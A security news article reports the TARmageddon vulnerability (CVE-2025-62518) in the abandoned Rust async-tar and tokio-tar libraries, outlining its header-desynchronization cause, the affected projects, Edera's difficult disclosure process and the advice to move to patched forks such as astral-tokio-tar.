A critical vulnerability, dubbed TARmageddon, was discovered in the abandoned async-tar library and its forks (including tokio-tar), which allows remote execution of arbitrary code.
The issue has been assigned the identifier CVE-2025-62518 and is a logic flaw caused by desynchronization, which allows unauthenticated attackers to inject additional entries into the archive during TAR file extraction.
The vulnerability manifests when processing nested TAR archives with mismatched ustar and PAX extended headers. Due to a bug, the parser jumps into the file contents, mistakes it for tar headers, and extracts attacker-crafted files.
Experts at Edera who discovered the vulnerability explain that attackers can exploit the issue to overwrite files during supply chain attacks — replacing configuration files and taking control of build systems.
The main danger of CVE-2025-62518 is that the vulnerability affects not only projects using async-tar itself, but also tokio-tar — a hugely popular fork with more than 7 million downloads on crates.io — which has also been abandoned by its maintainers.
Although the active forks have already received patches, Edera researchers warn that it’s impossible to accurately assess the scope of the issue due to the extremely widespread use of other forks, including tokio-tar.
“Due to the widespread use of tokio-tar in various forms, it is impossible to accurately estimate the blast radius of this bug across the ecosystem in advance,” Edera says. “Although the maintained forks have been successfully patched, this case highlights a serious systemic problem: the extremely popular tokio-tar remains unpatched.”
Thus, the TARmageddon issue affects numerous popular projects, including Binstalk, Astral’s uv Python package manager, the wasmCloud platform, liboxen, and the open-source testcontainers library.
The Edera team reports that contacting the developers of async-tar and tokio-tar proved extremely difficult, since “neither project has a SECURITY.md or a public way to get in touch.” The specialists had to resort to social engineering and involve the community to find the right people. As a result, async-tar and astral-tokio-tar received patches, but the hugely popular tokio-tar did not.
Developers of some dependent projects contacted by Edera specialists also said they plan to remove the vulnerable dependency or switch to a patched fork. However, others did not respond at all, and many projects may be using the vulnerable library without even realizing there’s a problem.
Edera advises everyone to either upgrade to the patched version or immediately remove the vulnerable tokio-tar dependency, which appears to be abandoned. Researchers recommend switching, for example, to the actively maintained fork astral-tokio-tar (which is a fork of edera-dev/tokio-tar, which in turn is a fork of vorot93/tokio-tar, which in turn is a fork of dignifiedquire/async-tar, based on alexcrichton/tar-rs).
At the same time, Edera’s own fork (krata-tokio-tar) will be archived to avoid creating additional confusion in the ecosystem.